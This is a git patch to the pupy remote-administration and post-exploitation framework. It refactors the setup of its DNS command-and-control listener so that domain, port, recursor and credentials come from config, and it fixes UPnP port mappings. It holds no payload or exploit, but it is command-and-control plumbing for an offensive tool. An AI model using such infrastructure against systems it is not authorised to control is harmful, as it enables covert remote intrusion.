From 30ad7c1a2a63536888a72d2781a3bb65e3038a42 Mon Sep 17 00:00:00 2001
From: Oleksii Shevchuk <alxchk@gmail.com>
Date: Tue, 14 Mar 2017 23:28:05 +0200
Subject: [PATCH] Generate DNSCNC state from config

---
 pupy/pupy.conf.default     |  1 +
 pupy/pupylib/PupyDnsCnc.py | 46 +++++++++++++++++++++++++-------------
 pupy/pupylib/PupyServer.py | 11 +++++----
 pupy/pupysh.py             |  6 ++---
 4 files changed, 39 insertions(+), 25 deletions(-)

diff --git a/pupy/pupy.conf.default b/pupy/pupy.conf.default
index 59c6bde3..ac2a973b 100644
--- a/pupy/pupy.conf.default
+++ b/pupy/pupy.conf.default
@@ -15,6 +15,7 @@ httpd = false
 
 #dnscnc = localhost:5454 starts the DNS cnc listener on the port 5454.
 dnscnc = false
+recursor = false
 
 # allow requests to services like ifconfig.co to automatically retrieve public IP
 allow_requests_to_external_services = false
diff --git a/pupy/pupylib/PupyDnsCnc.py b/pupy/pupylib/PupyDnsCnc.py
index 47eca6e1..d4d6b71c 100644
--- a/pupy/pupylib/PupyDnsCnc.py
+++ b/pupy/pupylib/PupyDnsCnc.py
@@ -6,7 +6,7 @@ from network.lib.picocmd.picocmd import *
 from Queue import Queue
 
 from pupylib.PupyConfig import PupyConfig
-from pupylib.utils.network import get_listener_ip
+from pupylib.utils.network import get_listener_ip, get_listener_port
 
 import requests
 import netifaces
@@ -57,26 +57,42 @@ class PupyDnsCommandServerHandler(DnsCommandServerHandler):
 
 class PupyDnsCnc(object):
     def __init__(
-            self, domain, igd=None, connect_host=None,
-            recursor='8.8.8.8', port=5353, listen='0.0.0.0',
+            self, igd=None, connect_host=None,
+            recursor=None,
             connect_transport='ssl', connect_port=443,
             config=None, credentials=None
         ):
 
         credentials = credentials or Credentials()
         config = config or PupyConfig()
+
         self.config = config
-
-        connect_host = connect_host or config.getip('pupyd', 'address')
-
+        self.credentials = credentials
         self.igd = igd
-        self.transport = connect_transport or config.get('pupyd', 'transport')
-        self.port = int(connect_port  or config.getint('pupyd', 'port'))
-        self.host = connect_host if connect_host else get_listener_ip(
-            external=True, config=config, igd=igd
-        )
-        if self.host:
-            self.host = [ str(self.host) ]
+
+        fdqn = self.config.get('pupyd', 'dnscnc').split(':')
+        domain = fdqn[0]
+        if len(fdqn) > 1:
+            port = int(fdqn[1])
+        else:
+            port = 53
+
+        listen = str(config.get('pupyd', 'address') or '0.0.0.0')
+        prefer_external = config.getboolean('gen', 'external')
+
+        self.host = [
+            str(get_listener_ip(
+                external=prefer_external,
+                config=config,
+                igd=igd
+            ))
+        ]
+        self.port = get_listener_port(config, external=prefer_external)
+        self.transport = config.get('pupyd', 'transport')
+
+        recursor = config.get('pupyd', 'recursor')
+        if recursor and recursor.lower() in ('no', 'false', 'stop', 'n', 'disable'):
+            recursor = None
 
         self.dns_domain = domain
         self.dns_port = port
@@ -95,8 +111,8 @@ class PupyDnsCnc(object):
         )
 
         if self.igd and self.igd.available:
-            self.igd.AddPortMapping(int(port), 'UDP', 53)
-            self.igd.AddPortMapping(int(port), 'TCP', 53)
+            self.igd.AddPortMapping(53, 'UDP', int(port))
+            self.igd.AddPortMapping(53, 'TCP', int(port))
 
         self.server.start()
 
diff --git a/pupy/pupylib/PupyServer.py b/pupy/pupylib/PupyServer.py
index 213d7d6b..57f516b8 100644
--- a/pupy/pupylib/PupyServer.py
+++ b/pupy/pupylib/PupyServer.py
@@ -47,7 +47,7 @@ from . import PupyClient
 import os.path
 
 class PupyServer(threading.Thread):
-    def __init__(self, config):
+    def __init__(self, config, credentials):
         super(PupyServer, self).__init__()
         self.daemon = True
         self.server = None
@@ -61,6 +61,8 @@ class PupyServer(threading.Thread):
         self._current_id_lock = threading.Lock()
 
         self.config = config or PupyConfig()
+        self.credentials = credentials or PupyCredentials()
+
         self.port = self.config.getint('pupyd', 'port')
         self.address = self.config.getip('pupyd', 'address') or ''
 
@@ -108,12 +110,9 @@ class PupyServer(threading.Thread):
                 dnsport = 5454
 
             self.dnscnc = PupyDnsCnc(
-                fdqn,
                 igd=self.igd,
-                port=dnsport,
-                connect_port=self.port,
-                connect_transport=self.transport,
-                config=self.config
+                config=self.config,
+                credentials=self.credentials
             )
 
 
diff --git a/pupy/pupysh.py b/pupy/pupysh.py
index 5cbec941..d00dcc43 100755
--- a/pupy/pupysh.py
+++ b/pupy/pupysh.py
@@ -81,8 +81,7 @@ if __name__=="__main__":
         PupyCredentials.ENCRYPTOR = None
 
     # Try to initialize credentials before CMD loop
-    PupyCredentials.Credentials()
-
+    credentials = PupyCredentials.Credentials()
     config = PupyConfig()
 
     if args.port:
@@ -94,8 +93,7 @@ if __name__=="__main__":
     if args.transport_args:
         config.set('pupyd', 'transport_args', args.transport_args, cmd=True)
 
-    pupyServer = PupyServer(config)
-
+    pupyServer = PupyServer(config, credentials)
     pupycmd = PupyCmdLoop(pupyServer)
 
     pupyServer.start()